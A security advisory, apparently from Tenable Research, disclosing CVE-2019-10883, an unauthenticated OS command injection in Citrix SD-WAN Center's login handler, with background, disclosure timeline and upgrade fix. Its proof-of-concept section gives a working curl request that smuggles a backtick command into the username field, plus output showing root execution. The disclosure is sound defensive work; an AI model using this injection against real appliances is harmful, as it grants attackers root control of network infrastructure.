在 Citrix SD-WAN Center 中發現重大 OS 命令插入弱點

Tenable Research has discovered a critical vulnerability in Citrix SD-WAN Center that could lead to remote code execution.

背景說明

On April 10, Citrix released a security bulletin for CVE-2019-10883, an operating system (OS) command injection vulnerability in Citrix SD-WAN Center 10.2.x before 10.2.1 and NetScaler SD-WAN Center 10.0.x before 10.0.7. Tenable Research discovered this vulnerability while developing a plugin for CVE-2017-6316 and reported it to Citrix.

Citrix Netscaler SD-WAN (software defined wide-area network) allows enterprises to manage their networks and create a virtual WAN. These types of products are used to support branch offices and remote data centers, and to maintain connectivity for cloud-based applications. According to the Citrix website, Netscaler SD-WAN is used in several industries like shipping, non-profit, hospitality and others.

分析

While reviewing CTX236992, Tenable Research observed that most of the vulnerabilities in this security bulletin required authentication. For the purpose of writing an uncredentialed Nessus plugin, we ended up looking at two unauthenticated command injection vulnerabilities mentioned in the writeup by the researchers who were credited in CTX236992. These vulnerabilities appeared to be linked to CVE-2017-6316, a vulnerability in the Citrix SD-WAN appliance.

Through our research of CVE-2017-6316, we discovered the Citrix SD-WAN Center 10.2.0.136.733315 was vulnerable to insufficient validation of user-supplied data ($username) in the controller located at /home/talariuser/www/app/Controller/UsersController.php (CVE-2019-10883).

概念驗證

An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary commands with root privileges. This could be achieved by running the following cURL command:

curl -skv --tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login'

The output from running this command:

root@VWC:/home/talariuser/www/app/Controller# cat /tmp/test

uid=0(root) gid=0(root) groups=0(root)

Vendor response

Tenable Research contacted Citrix in early February and confirmed they reproduced the vulnerability by the end of February. Citrix published its security bulletin for this vulnerability on April 10.

解決方法

Users should upgrade to Citrix SD-WAN Center 10.2.1 or later and NetScaler SD-WAN Center 10.0.7 or later. Additionally, Citrix provided a list of best practices that should be used to harden the security of the SD-WAN Center.

取得更多資訊

• Security Bulletin: Citrix SD-WAN Center Security Updates
• Tenable Advisory

深入瞭解 Tenable，這是用於全面管理新型攻擊破綻的首創 Cyber Exposure 平台。

Get a free 60-day trial of Tenable.io Vulnerability Management.